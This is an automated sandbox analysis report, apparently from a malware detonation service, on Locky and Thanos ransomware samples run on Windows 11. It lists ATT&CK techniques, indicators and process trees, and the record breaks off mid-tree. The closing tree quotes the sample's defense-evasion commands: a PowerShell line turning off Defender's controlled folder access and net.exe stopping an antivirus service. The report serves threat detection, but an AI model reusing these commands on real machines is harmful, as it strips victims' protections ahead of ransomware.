locky | hxxps://github[.]com/kh4sh3i/Ransomware-Samples

Resubmissions

08/03/2025, 17:11

250308-vqjtwazwcz 10

02/02/2025, 15:47

250202-s8dpgazqbp 10

02/02/2025, 15:44

250202-s6mvcszpel 6

Analysis

max time kernel
161s
max time network
166s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
08/03/2025, 17:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/kh4sh3i/Ransomware-Samples

Score

10^/10

locky defense_evasion discovery execution ransomware

Malware Config

Signatures

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Locky
Ransomware strain released in 2016, with advanced features like anti-analysis.
ransomware locky
Locky family
locky

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

Executes dropped EXE 1 IoCs

pid	Process
3864	svchost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4972	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
4	raw.githubusercontent.com
4	camo.githubusercontent.com
23	raw.githubusercontent.com
35	raw.githubusercontent.com
43	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
6096	arp.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2972	sc.exe
5088	sc.exe
1272	sc.exe
1564	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Locky.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5232	PING.EXE
5500	cmd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 3 IoCs

defense_evasion

pid	Process
4560	taskkill.exe
4272	taskkill.exe
3548	taskkill.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

NTFS ADS 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\svchost.exe\:Zone.Identifier:$DATA	Locky.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Thanos.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Locky.zip:Zone.Identifier	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2012	notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5232	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1584	msedge.exe
1584	msedge.exe
3120	msedge.exe
3120	msedge.exe
1832	identity_helper.exe
1832	identity_helper.exe
2060	msedge.exe
2060	msedge.exe
1700	msedge.exe
1700	msedge.exe
3516	msedge.exe
3516	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
2832	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
4356	OpenWith.exe
4356	OpenWith.exe
4356	OpenWith.exe
4356	OpenWith.exe
4356	OpenWith.exe
4356	OpenWith.exe
4356	OpenWith.exe
4752	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3120 wrote to memory of 2976	3120	msedge.exe	81
PID 3120 wrote to memory of 2976	3120	msedge.exe	81
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 2932	3120	msedge.exe	83
PID 3120 wrote to memory of 1584	3120	msedge.exe	84
PID 3120 wrote to memory of 1584	3120	msedge.exe	84
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85
PID 3120 wrote to memory of 4340	3120	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/kh4sh3i/Ransomware-Samples
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb2af43cb8,0x7ffb2af43cc8,0x7ffb2af43cd8
  2⤵
  PID:2976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2
  2⤵
  PID:2932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
  2⤵
  PID:4340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:2072
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
  2⤵
  PID:236
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5744 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1
  2⤵
  PID:1756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
  2⤵
  PID:732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6360 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
  2⤵
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,12718878664877132976,17357249230742402262,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6544 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4828

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:556

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4840

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4356

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
PID:4392

C:\Users\Admin\Downloads\Ransomware.Locky\Locky.exe
"C:\Users\Admin\Downloads\Ransomware.Locky\Locky.exe"
1⤵
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:4576
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  C:\Users\Admin\AppData\Local\Temp\svchost.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysA1B5.tmp"
  2⤵
  PID:2700

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4752

C:\Users\Admin\Downloads\Ransomware.Thanos\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
"C:\Users\Admin\Downloads\Ransomware.Thanos\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"
1⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2832
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  PID:4972
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2396
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
